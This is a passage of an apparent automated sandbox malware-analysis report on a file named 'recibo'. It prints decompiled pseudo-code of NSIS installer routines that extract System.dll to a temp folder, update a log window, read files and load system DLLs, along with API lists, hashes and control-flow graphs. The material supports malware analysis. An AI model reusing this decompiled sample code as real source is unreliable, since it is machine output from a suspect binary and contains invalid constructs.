						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}


















                                                                                  0x0040176f
                                                                                  0x00401776
                                                                                  0x00401782
                                                                                  0x00401785
                                                                                  0x0040178a
                                                                                  0x0040178d
                                                                                  0x00401794
                                                                                  0x004017b0
                                                                                  0x00401796
                                                                                  0x00401797
                                                                                  0x00401797
                                                                                  0x004017b6
                                                                                  0x004017bb
                                                                                  0x004017bb
                                                                                  0x004017bf
                                                                                  0x004017c2
                                                                                  0x004017c7
                                                                                  0x004017c9
                                                                                  0x004017cb
                                                                                  0x004017d0
                                                                                  0x004017d0
                                                                                  0x004017db
                                                                                  0x004017db
                                                                                  0x004017ec
                                                                                  0x004017ee
                                                                                  0x004017ee
                                                                                  0x004017ef
                                                                                  0x004017ef
                                                                                  0x004017f2
                                                                                  0x004017f5
                                                                                  0x004017f8
                                                                                  0x004017f8
                                                                                  0x004017ff
                                                                                  0x0040180e
                                                                                  0x00401813
                                                                                  0x00401816
                                                                                  0x00401819
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040181b
                                                                                  0x0040181e
                                                                                  0x00401874
                                                                                  0x00401879
                                                                                  0x004015b6
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x00402c2a
                                                                                  0x00402c2d
                                                                                  0x00402c2d
                                                                                  0x00000000
                                                                                  0x00401820
                                                                                  0x00401826
                                                                                  0x0040182d
                                                                                  0x0040183a
                                                                                  0x00401845
                                                                                  0x0040185b
                                                                                  0x0040185b
                                                                                  0x0040185e
                                                                                  0x00000000
                                                                                  0x00401864
                                                                                  0x00401864
                                                                                  0x00401865
                                                                                  0x00401882
                                                                                  0x00402c33
                                                                                  0x00402c33
                                                                                  0x00402c33
                                                                                  0x00401867
                                                                                  0x00401867
                                                                                  0x00401868
                                                                                  0x00401493
                                                                                  0x0040239d
                                                                                  0x0040239d
                                                                                  0x0040239d
                                                                                  0x00401865
                                                                                  0x0040185e
                                                                                  0x00402c35
                                                                                  0x00402c39
                                                                                  0x00402c39
                                                                                  0x00401892
                                                                                  0x00401897
                                                                                  0x004018a5
                                                                                  0x004018aa
                                                                                  0x004018b0
                                                                                  0x004018b4
                                                                                  0x004018b6
                                                                                  0x004018be
                                                                                  0x004018ca
                                                                                  0x004018b8
                                                                                  0x004018b8
                                                                                  0x004018bc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004018bc
                                                                                  0x004018d3
                                                                                  0x004018d9
                                                                                  0x004018db
                                                                                  0x00000000
                                                                                  0x004018e1
                                                                                  0x004018e1
                                                                                  0x004018e4
                                                                                  0x004018fc
                                                                                  0x004018e6
                                                                                  0x004018e9
                                                                                  0x004018f2
                                                                                  0x004018f2
                                                                                  0x00401901
                                                                                  0x00401906
                                                                                  0x00402398
                                                                                  0x00000000
                                                                                  0x00402398
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00403418), ref: 004055FA
                                                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040560C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf321E.tmp$C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll$Call
                                                                                  • API String ID: 1941528284-3438832539
                                                                                  • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                  • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                  • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                  • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 856 40559f-4055b4 857 4055ba-4055cb 856->857 858 40566b-40566f 856->858 859 4055d6-4055e2 lstrlenW 857->859 860 4055cd-4055d1 call 40657a 857->860 862 4055e4-4055f4 lstrlenW 859->862 863 4055ff-405603 859->863 860->859 862->858 864 4055f6-4055fa lstrcatW 862->864 865 405612-405616 863->865 866 405605-40560c SetWindowTextW 863->866 864->863 867 405618-40565a SendMessageW * 3 865->867 868 40565c-40565e 865->868 866->865 867->868 868->858 869 405660-405663 868->869 869->858
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4; // 0x10442
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                                  0x004055a5
                                                                                  0x004055af
                                                                                  0x004055b4
                                                                                  0x004055ba
                                                                                  0x004055c5
                                                                                  0x004055c8
                                                                                  0x004055cb
                                                                                  0x004055d1
                                                                                  0x004055d1
                                                                                  0x004055d7
                                                                                  0x004055df
                                                                                  0x004055e2
                                                                                  0x004055ff
                                                                                  0x00405603
                                                                                  0x0040560c
                                                                                  0x0040560c
                                                                                  0x00405616
                                                                                  0x0040561f
                                                                                  0x0040562b
                                                                                  0x00405632
                                                                                  0x00405636
                                                                                  0x00405639
                                                                                  0x0040564c
                                                                                  0x0040565a
                                                                                  0x0040565a
                                                                                  0x0040565e
                                                                                  0x00405660
                                                                                  0x00405663
                                                                                  0x00000000
                                                                                  0x00405663
                                                                                  0x004055e4
                                                                                  0x004055ec
                                                                                  0x004055f4
                                                                                  0x004055fa
                                                                                  0x00000000
                                                                                  0x004055fa
                                                                                  0x004055f4
                                                                                  0x004055e2
                                                                                  0x0040566f

                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                  • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000,004231B5,773423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00403418), ref: 004055FA
                                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040560C
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll,00000000), ref: 00406779
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll
                                                                                  • API String ID: 1495540970-2536265409
                                                                                  • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                  • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                  • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                  • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 870 4026ec-402705 call 402d84 873 402c2a-402c2d 870->873 874 40270b-402712 870->874 877 402c33-402c39 873->877 875 402714 874->875 876 402717-40271a 874->876 875->876 878 402720-40272f call 40649d 876->878 879 40287e-402886 876->879 878->879 883 402735 878->883 879->873 884 40273b-40273f 883->884 885 4027d4-4027d7 884->885 886 402745-402760 ReadFile 884->886 888 4027d9-4027dc 885->888 889 4027ef-4027ff call 4060b0 885->889 886->879 887 402766-40276b 886->887 887->879 891 402771-40277f 887->891 888->889 892 4027de-4027e9 call 40610e 888->892 889->879 897 402801 889->897 894 402785-402797 MultiByteToWideChar 891->894 895 40283a-402846 call 406484 891->895 892->879 892->889 894->897 898 402799-40279c 894->898 895->877 901 402804-402807 897->901 902 40279e-4027a9 898->902 901->895 904 402809-40280e 901->904 902->901 905 4027ab-4027d0 SetFilePointer MultiByteToWideChar 902->905 906 402810-402815 904->906 907 40284b-40284f 904->907 905->902 908 4027d2 905->908 906->907 909 402817-40282a 906->909 910 402851-402855 907->910 911 40286c-402878 SetFilePointer 907->911 908->897 909->879 912 40282c-402832 909->912 913 402857-40285b 910->913 914 40285d-40286a 910->914 911->879 912->884 915 402838 912->915 913->911 913->914 914->879 915->879
                                                                                  C-Code - Quality: 87%
                                                                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                  0x004026ec
                                                                                  0x004026ee
                                                                                  0x004026f1
                                                                                  0x004026f3
                                                                                  0x004026f6
                                                                                  0x004026fb
                                                                                  0x004026ff
                                                                                  0x00402702
                                                                                  0x00402705
                                                                                  0x00402c2a
                                                                                  0x00402c2d
                                                                                  0x0040270b
                                                                                  0x0040270b
                                                                                  0x00402712
                                                                                  0x00402714
                                                                                  0x00402714
                                                                                  0x0040271a
                                                                                  0x0040287e
                                                                                  0x0040287e
                                                                                  0x00402881
                                                                                  0x00402886
                                                                                  0x004015b6
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x00000000
                                                                                  0x00402720
                                                                                  0x00402721
                                                                                  0x0040272c
                                                                                  0x0040272f
                                                                                  0x0040273b
                                                                                  0x0040273f
                                                                                  0x004027d7
                                                                                  0x004027ef
                                                                                  0x004027ff
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00402745
                                                                                  0x00402745
                                                                                  0x00402748
                                                                                  0x00402749
                                                                                  0x0040274c
                                                                                  0x00402751
                                                                                  0x00402758
                                                                                  0x00402760
                                                                                  0x00000000
                                                                                  0x00402766
                                                                                  0x00402766
                                                                                  0x0040276b
                                                                                  0x00000000
                                                                                  0x00402771
                                                                                  0x00402771
                                                                                  0x00402779
                                                                                  0x0040277c
                                                                                  0x0040277f
                                                                                  0x0040283a
                                                                                  0x00402841
                                                                                  0x00402785
                                                                                  0x0040278b
                                                                                  0x00402797
                                                                                  0x00402801
                                                                                  0x00402801
                                                                                  0x00402799
                                                                                  0x00402799
                                                                                  0x0040279c
                                                                                  0x0040279e
                                                                                  0x0040279e
                                                                                  0x0040279e
                                                                                  0x004027a1
                                                                                  0x004027a6
                                                                                  0x004027a9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004027ab
                                                                                  0x004027ae
                                                                                  0x004027b6
                                                                                  0x004027c2
                                                                                  0x004027d0
                                                                                  0x00000000
                                                                                  0x004027d2
                                                                                  0x00000000
                                                                                  0x004027d2
                                                                                  0x00000000
                                                                                  0x004027d0
                                                                                  0x0040279e
                                                                                  0x00402804
                                                                                  0x00402807
                                                                                  0x00000000
                                                                                  0x00402809
                                                                                  0x0040280e
                                                                                  0x0040284f
                                                                                  0x00402871
                                                                                  0x00402878
                                                                                  0x0040285d
                                                                                  0x0040285d
                                                                                  0x00402860
                                                                                  0x00402863
                                                                                  0x00402866
                                                                                  0x00402866
                                                                                  0x00000000
                                                                                  0x00402817
                                                                                  0x00402817
                                                                                  0x0040281a
                                                                                  0x0040281d
                                                                                  0x00402823
                                                                                  0x00402827
                                                                                  0x0040282a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040282a
                                                                                  0x0040280e
                                                                                  0x00402807
                                                                                  0x0040277f
                                                                                  0x0040276b
                                                                                  0x00402760
                                                                                  0x00000000
                                                                                  0x0040282c
                                                                                  0x0040282c
                                                                                  0x0040282f
                                                                                  0x00402838
                                                                                  0x00000000
                                                                                  0x0040272f
                                                                                  0x0040271a
                                                                                  0x00402c33
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                    • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                  • String ID: 9
                                                                                  • API String ID: 163830602-2366072709
                                                                                  • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                  • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                  • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                  • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 916 40689a-4068ba GetSystemDirectoryW 917 4068bc 916->917 918 4068be-4068c0 916->918 917->918 919 4068d1-4068d3 918->919 920 4068c2-4068cb 918->920 922 4068d4-406907 wsprintfW LoadLibraryExW 919->922 920->919 921 4068cd-4068cf 920->921 921->922
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                  0x004068b1
                                                                                  0x004068ba
                                                                                  0x004068bc
                                                                                  0x004068bc
                                                                                  0x004068c0
                                                                                  0x004068d3
                                                                                  0x004068cd
                                                                                  0x004068cd
                                                                                  0x004068cd
                                                                                  0x004068ec
                                                                                  0x00406900
                                                                                  0x00406907

                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                  • wsprintfW.USER32 ref: 004068EC
                                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
